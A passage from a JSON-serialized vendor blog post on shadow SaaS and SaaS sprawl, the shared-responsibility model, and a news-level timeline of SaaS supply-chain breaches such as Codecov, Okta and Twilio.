domain.",[],{},{"nodeType":178,"data":280723,"content":280724},{},[280725],{"nodeType":173,"value":280726,"marks":280727,"data":280728},"The lack of visibility means many IT and security teams missed the explosion of SaaS apps, plugins, extensions, and integrations that make up the modern IT stack.  More crucially, they’ve missed the movement of company data into these apps. Complicating matters further, many of these apps are duplicate, abandoned or unmanaged - an issue often called “SaaS sprawl.”",[],{},{"nodeType":312,"data":280730,"content":280734},{"target":280731},{"sys":280732},{"id":280733,"type":317,"linkType":318},"5NfrrDeIPs7TE213UYly7E",[],{"nodeType":235,"data":280736,"content":280737},{},[280738],{"nodeType":173,"value":280739,"marks":280740,"data":280741},"Increasing incidents and impacts",[],{},{"nodeType":178,"data":280743,"content":280744},{},[280745],{"nodeType":173,"value":280746,"marks":280747,"data":280748},"Though security teams have lost direct visibility, they’ve not lost complete visibility and many are finding out about at least a fraction of these apps - typically by working with finance teams once employees want apps to go from free-tier to licensed plans. And all too often, security teams find out about shadow SaaS apps in the worst way possible - when something has already gone wrong and security is asked to respond to an incident on a SaaS platform.",[],{},{"nodeType":178,"data":280750,"content":280751},{},[280752],{"nodeType":173,"value":280753,"marks":280754,"data":280755},"In both cases, security is getting visibility too late to be of much value. Once a team has been using an app (even on a free tier) for a year, there is very little Security can do that will convince them to move to a more secure app, or for multiple teams to use a single app. Typically, this intervention from Security needs to happen very early - long before finance is involved - in order to make a positive impact. ",[],{},{"nodeType":178,"data":280757,"content":280758},{},[280759],{"nodeType":173,"value":280760,"marks":280761,"data":280762},"Incident Response is necessary, of course, when a SaaS account is breached (or an ex-employee SaaS account that was never properly offboarded), but cannot recover the lost data after the proverbial horse has bolted. It’s now possible to get into the process early, so security teams can get ahead of the problem to reduce the risk.",[],{},{"nodeType":178,"data":280764,"content":280765},{},[280766],{"nodeType":173,"value":280767,"marks":280768,"data":280769},"Another situation that is increasingly pressing, and difficult for security teams to deal with is the increasingly regular: “App X has just had a major breach, are we using AppX, is any of our data there?” It’s an embarrassing situation to not be able to answer these questions.",[],{},{"nodeType":235,"data":280771,"content":280772},{},[280773],{"nodeType":173,"value":280774,"marks":280775,"data":280776},"Core problem",[],{},{"nodeType":178,"data":280778,"content":280779},{},[280780,280784,280793],{"nodeType":173,"value":280781,"marks":280782,"data":280783},"Once teams get visibility into the scope of the Shadow SaaS and sprawl problem, they find that Security no longer dictates the pace of adoption. They’re also typically surprised by the sheer volume of apps employees have adopted. A ",[],{},{"nodeType":186,"data":280785,"content":280787},{"uri":280786},"https://ascendixtech.com/number-saas-companies-statistics/",[280788],{"nodeType":173,"value":280789,"marks":280790,"data":280792},"report from Ascendix",[280791],{"type":194},{},{"nodeType":173,"value":280794,"marks":280795,"data":280796}," claims that “by the end of 2023, there will be anywhere from 30,000-72,000 SaaS companies in operation.” Clearly these aren’t all work apps or hyper specialized, but there should be no doubt that we aren’t talking about a few dozen apps being adopted.",[],{},{"nodeType":178,"data":280798,"content":280799},{},[280800],{"nodeType":173,"value":280801,"marks":280802,"data":280803},"Once teams get visibility of the pace that news apps are added they realize they need to risk assess dozens of apps a month instead of the dozen a year that were going through IT in the old, managed and controlled process. To deal with this massive influx of new apps, security teams feel they must either radically increase the headcount, cut corners or drastically increase acceptable risk levels for data security. None of these are pleasant options.",[],{},{"nodeType":235,"data":280805,"content":280806},{},[280807],{"nodeType":173,"value":280808,"marks":280809,"data":280810},"Temptation to revert to the old ways of block-first",[],{},{"nodeType":178,"data":280812,"content":280813},{},[280814],{"nodeType":173,"value":280815,"marks":280816,"data":280817},"When the idea of the options above proves daunting or impossible, Security often tries to revert to the old process - regain the ability to set the pace of adoption by re-establishing the gate. Practically, this means that you’re deploying technical controls to try block all SaaS apps until they are approved (and marked as allowed) by IT or Security. Cloud Access Security Brokers (CASBs) were built to do exactly this - help security teams control (and block) access to “unsanctioned” SaaS that IT hasn’t approved (incidentally I think this explains why the CASB segment has failed). ",[],{},{"nodeType":178,"data":280819,"content":280820},{},[280821],{"nodeType":173,"value":280822,"marks":280823,"data":280824},"Technically, this makes total sense. But the unforeseen consequence is that it positions Security as blockers (aka the “department of no”), and puts them at odds with the rest of the business, rather than working towards a shared goal. ",[],{},{"nodeType":178,"data":280826,"content":280827},{},[280828,280832,280837],{"nodeType":173,"value":280829,"marks":280830,"data":280831},"This block-everything-until-security-approves-it position requires incredible executive support to maintain. For all but the most risk-sensitive organizations (read .gov), this position also normalizes employee behavior to bypass Security in favor of working quickly and effectively. In the end, Security actually ",[],{},{"nodeType":173,"value":280833,"marks":280834,"data":280836},"loses visibility",[280835],{"type":1646},{},{"nodeType":173,"value":280838,"marks":280839,"data":280840}," into employee SaaS use and effectively loses control, rather than locking it down. On behalf of all the employees out there, I want to make a point to say employees aren’t trying to break rules Security put in place, they’re just trying to get their jobs done, and might try and find ways around things they see as unreasonably slowing them down or preventing them from reaching their targets. Seen in this light, it’s no surprise that:",[],{},{"nodeType":250,"data":280842,"content":280843},{},[280844,280854,280864],{"nodeType":254,"data":280845,"content":280846},{},[280847],{"nodeType":178,"data":280848,"content":280849},{},[280850],{"nodeType":173,"value":280851,"marks":280852,"data":280853},"If you block websites, employees bypass network controls, ",[],{},{"nodeType":254,"data":280855,"content":280856},{},[280857],{"nodeType":178,"data":280858,"content":280859},{},[280860],{"nodeType":173,"value":280861,"marks":280862,"data":280863},"if you block social logins, employees use passwords, ",[],{},{"nodeType":254,"data":280865,"content":280866},{},[280867],{"nodeType":178,"data":280868,"content":280869},{},[280870],{"nodeType":173,"value":280871,"marks":280872,"data":280873},"if you stop them using work devices to sign up to apps, they use personal devices.",[],{},{"nodeType":178,"data":280875,"content":280876},{},[280877],{"nodeType":173,"value":280878,"marks":280879,"data":280882},"Each blocking action leads to a worse security outcome, and blinds the security team further - losing control rather than regaining it.",[280880,280881],{"type":1646},{"type":370},{},{"nodeType":178,"data":280884,"content":280885},{},[280886],{"nodeType":173,"value":280887,"marks":280888,"data":280889},"You can attempt to delay this process by blocking, or you can adapt.",[],{},{"nodeType":235,"data":280891,"content":280892},{},[280893],{"nodeType":173,"value":280894,"marks":280895,"data":280896},"Surely there’s a better way",[],{},{"nodeType":178,"data":280898,"content":280899},{},[280900],{"nodeType":173,"value":280901,"marks":280902,"data":280903},"Of course we think there’s a better way, or we wouldn’t have written this. And don’t call me Shirley. ",[],{},{"nodeType":178,"data":280905,"content":280906},{},[280907],{"nodeType":173,"value":280908,"marks":280909,"data":280910},"The first thing we need to do as an industry is agree that we don’t want to be the blockers. We don’t want to stop employees from self-adopting apps. We understand they are best placed to find and select the tools that are going to allow them to be more productive and help your company succeed. We need to embrace SaaS app self-adoption. Stop asking employees to adapt to fit our legacy processes and meet them halfway. Security can no longer be a gate with a default stance of “No, until.” Instead Security needs to be a business enablement partner that says “Yes, unless.”",[],{},{"nodeType":235,"data":280912,"content":280913},{},[280914],{"nodeType":173,"value":280915,"marks":280916,"data":280917},"Yes, unless?",[],{},{"nodeType":178,"data":280919,"content":280920},{},[280921],{"nodeType":173,"value":280922,"marks":280923,"data":280924},"To adapt to this new SaaS-first world, security must move from saying “No, until we’ve had time to fully vet and onboard this app officially” to “Yes! You can use that app, unless we quickly identify security risks that outweigh the value of the tool.” I understand this is deeply uncomfortable for many security practitioners (as it still is for me), but let me explain why I think this leads to a better long-term outcome.",[],{},{"nodeType":178,"data":280926,"content":280927},{},[280928],{"nodeType":173,"value":280929,"marks":280930,"data":280931},"Obviously, self-adoption of SaaS is fundamentally different to IT/Security adopted and managed from a risk perspective. With SaaS, there’s no giant commitment upfront. SaaS apps aren’t forever - quite the opposite! Apps aren’t just unused and not-adopted and then suddenly fully-adopted. Just like adopting software was a process for Security and IT back in the day, employees follow a (less rigid) process with SaaS - from testing > to using > to finding value > to inviting teammates, etc. The risk grows as we proceed through the adoption process as employees add more data into the app and integrate it with other apps. ",[],{},{"nodeType":312,"data":280933,"content":280937},{"target":280934},{"sys":280935},{"id":280936,"type":317,"linkType":318},"2nzyuXDxjBGZN0YMvskGak",[],{"nodeType":178,"data":280939,"content":280940},{},[280941],{"nodeType":173,"value":280942,"marks":280943,"data":280944},"The upside for Security is that because SaaS adoption is a process over time, we can use that time to assess the risk of the app before it’s fully adopted, as long as we know about the app from the start. Luckily, many apps employees are using might ultimately be very low risk, so not every app will require a full security vetting like you would have done in the old-school process.",[],{},{"nodeType":178,"data":280946,"content":280947},{},[280948],{"nodeType":173,"value":280949,"marks":280950,"data":280951},"Our role as Security is to catch those apps that are high risk, either because the data going into them (or that will be) is high risk or because the app can perform some high-risk action (like managing your inventory or sending emails to customers or your behalf). Security can focus their efforts on these high-risk vendors and apps to make sure they can be trusted with their data. But the key thing is that Security needs to get involved early in the adoption process. ",[],{},{"nodeType":178,"data":280953,"content":280954},{},[280955],{"nodeType":173,"value":280956,"marks":280957,"data":280958},"I’m getting into the details now - so this feels like a good time to take a step back and think about the elements that make up a SaaS security program.",[],{},{"nodeType":169,"data":280960,"content":280961},{},[280962],{"nodeType":173,"value":280963,"marks":280964,"data":280965},"What’s a good SaaS security program?",[],{},{"nodeType":178,"data":280967,"content":280968},{},[280969],{"nodeType":173,"value":280970,"marks":280971,"data":280972},"The shared-responsibility model between cloud platforms and their customers is a great place to start, as it helps customers understand what their responsibilities are, and which responsibilities they’re delegating to their cloud provider.",[],{},{"nodeType":235,"data":280974,"content":280975},{},[280976],{"nodeType":173,"value":280977,"marks":280978,"data":280979},"Delegate to the cloud provider when you can ",[],{},{"nodeType":178,"data":280981,"content":280982},{},[280983,280987,280996],{"nodeType":173,"value":280984,"marks":280985,"data":280986},"It’s ",[],{},{"nodeType":186,"data":280988,"content":280990},{"uri":280989},"https://www.ncsc.gov.uk/collection/cloud/understanding-cloud-services/cloud-security-shared-responsibility-model",[280991],{"nodeType":173,"value":280992,"marks":280993,"data":280995},"generally preferable",[280994],{"type":194},{},{"nodeType":173,"value":280997,"marks":280998,"data":280999}," to delegate as much responsibility as possible to the cloud provider, so it’s no surprise that the SaaS model is the most common and fastest growing sector.",[],{},{"nodeType":178,"data":281001,"content":281002},{},[281003],{"nodeType":173,"value":281004,"marks":281005,"data":281006},"The following summary table produced by the National Cyber Security Centre (NCSC) does a great job at showing how much of the balance of security responsibility is outsourced to the SaaS provider. For reference, IaaS = infrastructure-as-a-service; PaaS = platform-as-a-service; SaaS = software-as-a-service:",[],{},{"nodeType":312,"data":281008,"content":281012},{"target":281009},{"sys":281010},{"id":281011,"type":317,"linkType":318},"17rMTpxgCAU5ropjkGIIjK",[],{"nodeType":178,"data":281014,"content":281015},{},[281016],{"nodeType":173,"value":281017,"marks":281018,"data":281019},"According to NCSC, the customer is responsible only for:",[],{},{"nodeType":246189,"data":281021,"content":281022},{},[281023,281033],{"nodeType":254,"data":281024,"content":281025},{},[281026],{"nodeType":178,"data":281027,"content":281028},{},[281029],{"nodeType":173,"value":281030,"marks":281031,"data":281032},"The configuration of the SaaS app and ",[],{},{"nodeType":254,"data":281034,"content":281035},{},[281036],{"nodeType":178,"data":281037,"content":281038},{},[281039],{"nodeType":173,"value":281040,"marks":281041,"data":281042},"Making sure that the identity and access control features provided by the vendor are used properly.",[],{},{"nodeType":178,"data":281044,"content":281045},{},[281046],{"nodeType":173,"value":281047,"marks":281048,"data":281049},"It’s worth pointing out here that the way application configuration is presented here is a bit of a red herring. The vast majority of SaaS apps (and especially self-adopted apps) allow very little, if any, configuration. Sure, the big core apps like Salesforce, Google Workspace, Microsoft 365 do (and often require a dedicated team or partner to run them), but they are highly unlikely to be self-adopted by employees.  As far as configuration is concerned, Security teams will often be limited to enabling “force MFA for all users” or “disallow public sharing” type of controls that are accessible even to non-technical users.",[],{},{"nodeType":178,"data":281051,"content":281052},{},[281053],{"nodeType":173,"value":281054,"marks":281055,"data":281056},"For the vast majority of apps in the organization, Security’s responsibility will boil down to:",[],{},{"nodeType":250,"data":281058,"content":281059},{},[281060,281070,281080],{"nodeType":254,"data":281061,"content":281062},{},[281063],{"nodeType":178,"data":281064,"content":281065},{},[281066],{"nodeType":173,"value":281067,"marks":281068,"data":281069},"Account security, i.e. making sure MFA and SSO (where available) is in place. ",[],{},{"nodeType":254,"data":281071,"content":281072},{},[281073],{"nodeType":178,"data":281074,"content":281075},{},[281076],{"nodeType":173,"value":281077,"marks":281078,"data":281079},"Ensuring  employees are using strong passwords, especially if MFA and/or SSO aren’t available.",[],{},{"nodeType":254,"data":281081,"content":281082},{},[281083],{"nodeType":178,"data":281084,"content":281085},{},[281086],{"nodeType":173,"value":281087,"marks":281088,"data":281089},"Removing external accounts (and accounts for those that have left the company) when no longer needed.",[],{},{"nodeType":178,"data":281091,"content":281092},{},[281093],{"nodeType":173,"value":281094,"marks":281095,"data":281096},"Isn’t it risky to delegate responsibility? While delegating security responsibilities is great and takes a huge load off your team, we do, unfortunately, need to consider who we’re delegating it to. Those gray boxes in the diagram above need to be taken care of.",[],{},{"nodeType":178,"data":281098,"content":281099},{},[281100],{"nodeType":173,"value":281101,"marks":281102,"data":281103},"This is what’s sometimes understood as “supply chain” security. You need to trust the SaaS vendor to uphold their end of the bargain and, more often than not, also the SaaS/cloud vendors they use (their sub-processors) as well.",[],{},{"nodeType":178,"data":281105,"content":281106},{},[281107],{"nodeType":173,"value":281108,"marks":281109,"data":281110},"This sounds a lot scarier than it is and in practice many SaaS vendors do a great job, with many providing easy-to-audit, externally-verified, policies through a framework such as SOC2, and most do regular penetration tests and have bug bounty programs etc.",[],{},{"nodeType":178,"data":281112,"content":281113},{},[281114],{"nodeType":173,"value":281115,"marks":281116,"data":281117},"There are exceptions when it makes sense to think more carefully about whether a third party can be trusted. Common reasons Push customers have cited for not trusting third parties include; ",[],{},{"nodeType":250,"data":281119,"content":281120},{},[281121],{"nodeType":254,"data":281122,"content":281123},{},[281124],{"nodeType":178,"data":281125,"content":281126},{},[281127],{"nodeType":173,"value":281128,"marks":281129,"data":281130},"The data going into these apps is simply too high risk. Many organizations have very sensitive customer information or intellectual property that they simply aren’t willing to entrust to a third party. Many don’t trust a third party with administrative access to the systems where this data is held.",[],{},{"nodeType":178,"data":281132,"content":281133},{},[281134],{"nodeType":173,"value":281135,"marks":281136,"data":281137},"If the data in the app, or the access the app has represents some significant (but not unacceptable) risk, you may also care about:",[],{},{"nodeType":250,"data":281139,"content":281140},{},[281141,281187,281197],{"nodeType":254,"data":281142,"content":281143},{},[281144],{"nodeType":178,"data":281145,"content":281146},{},[281147,281151,281160,281163,281171,281174,281183],{"nodeType":173,"value":281148,"marks":281149,"data":281150},"Vendors who’ve had a string of repeated breaches or security incidents. This is troubling because it’s a fairly common pattern for attackers to breach apps in ways that don’t impact customer information, but then use the information they learn from these breaches to launch far more successful breaches in future. Consider the string of breaches at ",[],{},{"nodeType":186,"data":281152,"content":281154},{"uri":281153},"https://www.bleepingcomputer.com/search/?q=lastpass+breach",[281155],{"nodeType":173,"value":281156,"marks":281157,"data":281159},"LastPass",[281158],{"type":194},{},{"nodeType":173,"value":2936,"marks":281161,"data":281162},[],{},{"nodeType":186,"data":281164,"content":281166},{"uri":281165},"https://www.bleepingcomputer.com/search/?q=okta+breach",[281167],{"nodeType":173,"value":211167,"marks":281168,"data":281170},[281169],{"type":194},{},{"nodeType":173,"value":2936,"marks":281172,"data":281173},[],{},{"nodeType":186,"data":281175,"content":281177},{"uri":281176},"https://www.bleepingcomputer.com/search/?q=twilio+breach",[281178],{"nodeType":173,"value":281179,"marks":281180,"data":281182},"Twilio",[281181],{"type":194},{},{"nodeType":173,"value":281184,"marks":281185,"data":281186}," (and many others) or as a typical example of this.",[],{},{"nodeType":254,"data":281188,"content":281189},{},[281190],{"nodeType":178,"data":281191,"content":281192},{},[281193],{"nodeType":173,"value":281194,"marks":281195,"data":281196},"Products that don’t offer adequate security features. Customers expect features such as MFA, SSO (either social login through OIDC or, ideally, SAML), and the ability to enforce these controls. This is especially important on platforms where the data is high-risk.",[],{},{"nodeType":254,"data":281198,"content":281199},{},[281200],{"nodeType":178,"data":281201,"content":281202},{},[281203],{"nodeType":173,"value":281204,"marks":281205,"data":281206},"The vendor operates in a sanctioned country or may not have the resources to adequately protect your data. Clearly vendors operating from (or that have close ties with) sanctioned or politically-complicated countries represent additional risk, as do vendors that are “one man bands” or are so small that it is hard to imagine they can afford to spend significant resources on security.",[],{},{"nodeType":235,"data":281208,"content":281209},{},[281210],{"nodeType":173,"value":281211,"marks":281212,"data":281213},"The two questions you need to ask to assess risk ",[],{},{"nodeType":178,"data":281215,"content":281216},{},[281217],{"nodeType":173,"value":281218,"marks":281219,"data":281220},"The essence of the shared-responsibility model can summarized as two questions:",[],{},{"nodeType":246189,"data":281222,"content":281223},{},[281224,281234],{"nodeType":254,"data":281225,"content":281226},{},[281227],{"nodeType":178,"data":281228,"content":281229},{},[281230],{"nodeType":173,"value":281231,"marks":281232,"data":281233},"Should we be using this app?",[],{},{"nodeType":254,"data":281235,"content":281236},{},[281237],{"nodeType":178,"data":281238,"content":281239},{},[281240],{"nodeType":173,"value":281241,"marks":281242,"data":281243},"Are we using it securely?",[],{},{"nodeType":312,"data":281245,"content":281249},{"target":281246},{"sys":281247},{"id":281248,"type":317,"linkType":318},"ToDXz2MBbEygwtJjiIKRX",[],{"nodeType":178,"data":281251,"content":281252},{},[281253],{"nodeType":173,"value":281254,"marks":281255,"data":281256},"A successful SaaS security program must address both these questions. We can’t spend all our time doing risk assessments and due diligence exercises on our supply chain while dropping the ball on account security. Similarly, we can’t just focus on making sure all accounts have MFA in place when the vendor is leaving the back door open.",[],{},{"nodeType":169,"data":281258,"content":281259},{},[281260],{"nodeType":173,"value":281261,"marks":281262,"data":281263},"When shared responsibility goes wrong",[],{},{"nodeType":178,"data":281265,"content":281266},{},[281267],{"nodeType":173,"value":281268,"marks":281269,"data":281270},"The following is an extract of some well-covered recent(ish) breaches of SaaS companies. As we go through it, pay attention to which side is dropping the ball in terms of the shared responsibility. The same organization can be:",[],{},{"nodeType":250,"data":281272,"content":281273},{},[281274,281284,281294],{"nodeType":254,"data":281275,"content":281276},{},[281277],{"nodeType":178,"data":281278,"content":281279},{},[281280],{"nodeType":173,"value":281281,"marks":281282,"data":281283},"the source of a breach, ",[],{},{"nodeType":254,"data":281285,"content":281286},{},[281287],{"nodeType":178,"data":281288,"content":281289},{},[281290],{"nodeType":173,"value":281291,"marks":281292,"data":281293},"the ultimate target that motivated a breach at a partner that was a softer target, ",[],{},{"nodeType":254,"data":281295,"content":281296},{},[281297],{"nodeType":178,"data":281298,"content":281299},{},[281300],{"nodeType":173,"value":281301,"marks":281302,"data":281303},"or simply the unlucky victim of a breach further down its supply chain.",[],{},{"nodeType":178,"data":281305,"content":281306},{},[281307],{"nodeType":173,"value":281308,"marks":281309,"data":281310},"That’s the thing about supply chain attacks, organizations are the attacker’s stepping stones. Where they are in the attack chain determines how we label their victims. ",[],{},{"nodeType":1653,"data":281312,"content":281313},{},[281314,281339,281420,281477,281520,281645],{"nodeType":1657,"data":281315,"content":281316},{},[281317,281328],{"nodeType":1687,"data":281318,"content":281319},{},[281320],{"nodeType":178,"data":281321,"content":281322},{},[281323],{"nodeType":173,"value":281324,"marks":281325,"data":281327},"Date",[281326],{"type":370},{},{"nodeType":1687,"data":281329,"content":281330},{},[281331],{"nodeType":178,"data":281332,"content":281333},{},[281334],{"nodeType":173,"value":281335,"marks":281336,"data":281338},"SaaS attack",[281337],{"type":370},{},{"nodeType":1657,"data":281340,"content":281341},{},[281342,281352],{"nodeType":1687,"data":281343,"content":281344},{},[281345],{"nodeType":178,"data":281346,"content":281347},{},[281348],{"nodeType":173,"value":281349,"marks":281350,"data":281351},"April 2021",[],{},{"nodeType":1687,"data":281353,"content":281354},{},[281355,281383],{"nodeType":178,"data":281356,"content":281357},{},[281358,281361,281370,281374,281379],{"nodeType":173,"value":37,"marks":281359,"data":281360},[],{},{"nodeType":186,"data":281362,"content":281364},{"uri":281363},"https://about.codecov.io/security-update/",[281365],{"nodeType":173,"value":281366,"marks":281367,"data":281369},"Backdoors inserted into some Codecov.io",[281368],{"type":194},{},{"nodeType":173,"value":281371,"marks":281372,"data":281373}," (a software development SaaS) tools after a credential breach grants access to their ",[],{},{"nodeType":173,"value":281375,"marks":281376,"data":281378},"Google Cloud Project",[281377],{"type":370},{},{"nodeType":173,"value":281380,"marks":281381,"data":281382}," (cloud infrastructure SaaS).  ",[],{},{"nodeType":178,"data":281384,"content":281385},{},[281386,281390,281399,281403,281408,281412,281416],{"nodeType":173,"value":281387,"marks":281388,"data":281389},"This breach ",[],{},{"nodeType":186,"data":281391,"content":281393},{"uri":281392},"https://www.twilio.com/blog/response-to-the-codecov-vulnerability",[281394],{"nodeType":173,"value":281395,"marks":281396,"data":281398},"affected multiple customers",[281397],{"type":194},{},{"nodeType":173,"value":281400,"marks":281401,"data":281402},", including ",[],{},{"nodeType":173,"value":281404,"marks":281405,"data":281407},"Atlassian",[281406],{"type":370},{},{"nodeType":173,"value":281409,"marks":281410,"data":281411}," (a developer and collaboration SaaS platform) and ",[],{},{"nodeType":173,"value":281179,"marks":281413,"data":281415},[281414],{"type":370},{},{"nodeType":173,"value":281417,"marks":281418,"data":281419}," (communications tooling SaaS company).  ",[],{},{"nodeType":1657,"data":281421,"content":281422},{},[281423,281433],{"nodeType":1687,"data":281424,"content":281425},{},[281426],{"nodeType":178,"data":281427,"content":281428},{},[281429],{"nodeType":173,"value":281430,"marks":281431,"data":281432},"Jan 2022",[],{},{"nodeType":1687,"data":281434,"content":281435},{},[281436],{"nodeType":178,"data":281437,"content":281438},{},[281439,281443,281447,281456,281460,281465,281469,281473],{"nodeType":173,"value":211167,"marks":281440,"data":281442},[281441],{"type":370},{},{"nodeType":173,"value":281444,"marks":281445,"data":281446}," (identity provider SaaS) ",[],{},{"nodeType":186,"data":281448,"content":281450},{"uri":281449},"https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/",[281451],{"nodeType":173,"value":281452,"marks":281453,"data":281455},"systems breached",[281454],{"type":194},{},{"nodeType":173,"value":281457,"marks":281458,"data":281459}," through a breach at ",[],{},{"nodeType":173,"value":281461,"marks":281462,"data":281464},"Sitel",[281463],{"type":370},{},{"nodeType":173,"value":281466,"marks":281467,"data":281468},", a support partner - attackers got access to Okta’s instances of ",[],{},{"nodeType":173,"value":281404,"marks":281470,"data":281472},[281471],{"type":370},{},{"nodeType":173,"value":281474,"marks":281475,"data":281476}," Jira, Slack, Splunk, RingCentral, and support tickets through Salesforce.  ",[],{},{"nodeType":1657,"data":281478,"content":281479},{},[281480,281490],{"nodeType":1687,"data":281481,"content":281482},{},[281483],{"nodeType":178,"data":281484,"content":281485},{},[281486],{"nodeType":173,"value":281487,"marks":281488,"data":281489},"March 2022",[],{},{"nodeType":1687,"data":281491,"content":281492},{},[281493],{"nodeType":178,"data":281494,"content":281495},{},[281496,281500,281504,281508,281517],{"nodeType":173,"value":281497,"marks":281498,"data":281499},"“0ktapus” phishing toolkit targeting ",[],{},{"nodeType":173,"value":211167,"marks":281501,"data":281503},[281502],{"type":370},{},{"nodeType":173,"value":281505,"marks":281506,"data":281507}," customers ",[],{},{"nodeType":186,"data":281509,"content":281511},{"uri":281510},"https://www.bleepingcomputer.com/news/security/twilio-hackers-hit-over-130-orgs-in-massive-okta-phishing-attack/",[281512],{"nodeType":173,"value":281513,"marks":281514,"data":281516},"is released",[281515],{"type":194},{},{"nodeType":173,"value":37,"marks":281518,"data":281519},[],{},{"nodeType":1657,"data":281521,"content":281522},{},[281523,281533],{"nodeType":1687,"data":281524,"content":281525},{},[281526],{"nodeType":178,"data":281527,"content":281528},{},[281529],{"nodeType":173,"value":281530,"marks":281531,"data":281532},"Aug 2022",[],{},{"nodeType":1687,"data":281534,"content":281535},{},[281536,281577,281604,281619,281638],{"nodeType":178,"data":281537,"content":281538},{},[281539,281543,281547,281551,281555,281564,281568,281573],{"nodeType":173,"value":281179,"marks":281540,"data":281542},[281541],{"type":370},{},{"nodeType":173,"value":281544,"marks":281545,"data":281546}," (one such ",[],{},{"nodeType":173,"value":211167,"marks":281548,"data":281550},[281549],{"type":370},{},{"nodeType":173,"value":281552,"marks":281553,"data":281554}," customer) ",[],{},{"nodeType":186,"data":281556,"content":281558},{"uri":281557},"https://www.twilio.com/blog/august-2022-social-engineering-attack",[281559],{"nodeType":173,"value":281560,"marks":281561,"data":281563},"was again breached",[281562],{"type":194},{},{"nodeType":173,"value":281565,"marks":281566,"data":281567}," and attackers used access to one of their products (",[],{},{"nodeType":173,"value":281569,"marks":281570,"data":281572},"Authy",[281571],{"type":370},{},{"nodeType":173,"value":281574,"marks":281575,"data":281576},", an MFA mobile app) to bypass MFA for some of their customers. ",[],{},{"nodeType":178,"data":281578,"content":281579},{},[281580,281584,281588,281591,281600],{"nodeType":173,"value":281581,"marks":281582,"data":281583},"Attackers appear to also have used ",[],{},{"nodeType":173,"value":281179,"marks":281585,"data":281587},[281586],{"type":370},{},{"nodeType":173,"value":3107,"marks":281589,"data":281590},[],{},{"nodeType":186,"data":281592,"content":281594},{"uri":281593},"https://www.bleepingcomputer.com/news/security/okta-one-time-mfa-passcodes-exposed-in-twilio-cyberattack/",[281595],{"nodeType":173,"value":281596,"marks":281597,"data":281599},"to gain access to SMS’s",[281598],{"type":194},{},{"nodeType":173,"value":281601,"marks":281602,"data":281603}," that were delivering Okta MFA codes to customers: ",[],{},{"nodeType":178,"data":281605,"content":281606},{},[281607,281611,281615],{"nodeType":173,"value":281608,"marks":281609,"data":281610},"This leads to a breach at",[],{},{"nodeType":173,"value":3107,"marks":281612,"data":281614},[281613],{"type":370},{},{"nodeType":173,"value":281616,"marks":281617,"data":281618},"Mailchimp (email marketing SaaS), which in turn affects many upstream customers like Digital Ocean (infrastructure hosting SaaS) and Signal Messenger",[],{},{"nodeType":178,"data":281620,"content":281621},{},[281622,281626,281635],{"nodeType":173,"value":281623,"marks":281624,"data":281625},"Klaviyo (another email marketing SaaS) ",[],{},{"nodeType":186,"data":281627,"content":281629},{"uri":281628},"https://www.bleepingcomputer.com/news/security/email-marketing-firm-hacked-to-steal-crypto-focused-mailing-lists/",[281630],{"nodeType":173,"value":281631,"marks":281632,"data":281634},"is also impacted",[281633],{"type":194},{},{"nodeType":173,"value":197,"marks":281636,"data":281637},[],{},{"nodeType":178,"data":281639,"content":281640},{},[281641],{"nodeType":173,"value":281642,"marks":281643,"data":281644},"Breaches on these email marketing SaaS apps lead to even more downstream breaches for customers in finance and crypto spaces, such as Trezor, Edge Wallet, Cointelegraph, Ethereum FESP, Messari and Decrypt.",[],{},{"nodeType":1657,"data":281646,"content":281647},{},[281648,281658],{"nodeType":1687,"data":281649,"content":281650},{},[281651],{"nodeType":178,"data":281652,"content":281653},{},[281654],{"nodeType":173,"value":281655,"marks":281656,"data":281657},"Sept and Dec 2022",[],{},{"nodeType":1687,"data":281659,"content":281660},{},[281661],{"nodeType":178,"data":281662,"content":281663},{},[281664,281668,281677,281681,281685,281688,281703],{"nodeType":173,"value":281665,"marks":281666,"data":281667},"Product source code ",[],{},{"nodeType":186,"data":281669,"content":281671},{"uri":281670},"https://www.bleepingcomputer.com/news/security/oktas-source-code-stolen-after-github-repositories-hacked/",[281672],{"nodeType":173,"value":281673,"marks":281674,"data":281676},"stolen from the Github repositories",[281675],{"type":194},{},{"nodeType":173,"value":281678,"marks":281679,"data":281680}," of ",[],{},{"nodeType":173,"value":211167,"marks":281682,"data":281684},[281683],{"type":370},{},{"nodeType":173,"value":933,"marks":281686,"data":281687},[],{},{"nodeType":186,"data":281689,"content":281691},{"uri":281690},"https://www.bleepingcomputer.com/news/security/auth0-warns-that-some-source-code-repos-may-have-been-stolen/",[281692,281698],{"nodeType":173,"value":281693,"marks":281694,"data":281697},"Auth0",[281695,281696],{"type":194},{"type":370},{},{"nodeType":173,"value":281699,"marks":281700,"data":281702}," (an Okta subsidiary",[281701],{"type":194},{},{"nodeType":173,"value":281704,"marks":281705,"data":281706}," that is also an identity provider SaaS platform)",[],{},{"nodeType":178,"data":281708,"content":281709},{},[281710],{"nodeType":173,"value":281711,"marks":281712,"data":281713},"This is a very shallow summary of a small sample of events during this time frame, but it’s interesting how interrelated these SaaS services are. Many are part of each other’s supply chains (for example, Twilio is targeted as an Okta customer itself, and used to compromise Okta customer MFA codes that are delivered by Twilio to other Okta customers) and so breaches in one SaaS have rippling effects that sometimes take months or even years to materialize after a breach occurs.",[],{},{"nodeType":178,"data":281715,"content":281716},{},[281717,281721,281729],{"nodeType":173,"value":281718,"marks":281719,"data":281720},"There’s an interesting trend to call out here: breaches at a SaaS vendor appear to lead to (or correlate with) further breaches, such as the string of breaches at ",[],{},{"nodeType":186,"data":281722,"content":281724},{"uri":281723},"https://thehackernews.com/2023/02/lastpass-reveals-second-attack.html",[281725],{"nodeType":173,"value":281156,"marks":281726,"data":281728},[281727],{"type":194},{},{"nodeType":173,"value":281730,"marks":281731,"data":281732},". But it’s incredibly unclear how to balance the risk of using these vendors, especially when some of these companies (like Okta) are a big part of many organization’s security strategies.",[],{},{"nodeType":178,"data":281734,"content":281735},{},[281736],{"nodeType":173,"value":281737,"marks":281738,"data":281739},"Ultimately, though… ",[],{},{"nodeType":178,"data":281741,"content":281742},{},[281743],{"nodeType":173,"value":281744,"marks":281745,"data":281748},"The root of most of these networks of supply chain attacks are simple account compromises. ",[281746,281747],{"type":370},{"type":1646},{},{"nodeType":178,"data":281750,"content":281751},{},[281752,281756,281761],{"nodeType":173,"value":281753,"marks":281754,"data":281755},"While most organizations think of the supply chain aspect (should we be using this app?) as the majority of the problem, or at least the first problem to solve - ",[],{},{"nodeType":173,"value":281757,"marks":281758,"data":281760},"account security",[281759],{"type":1646},{},{"nodeType":173,"value":281762,"marks":281763,"data":281764}," is ultimately at the heart of the problem. A 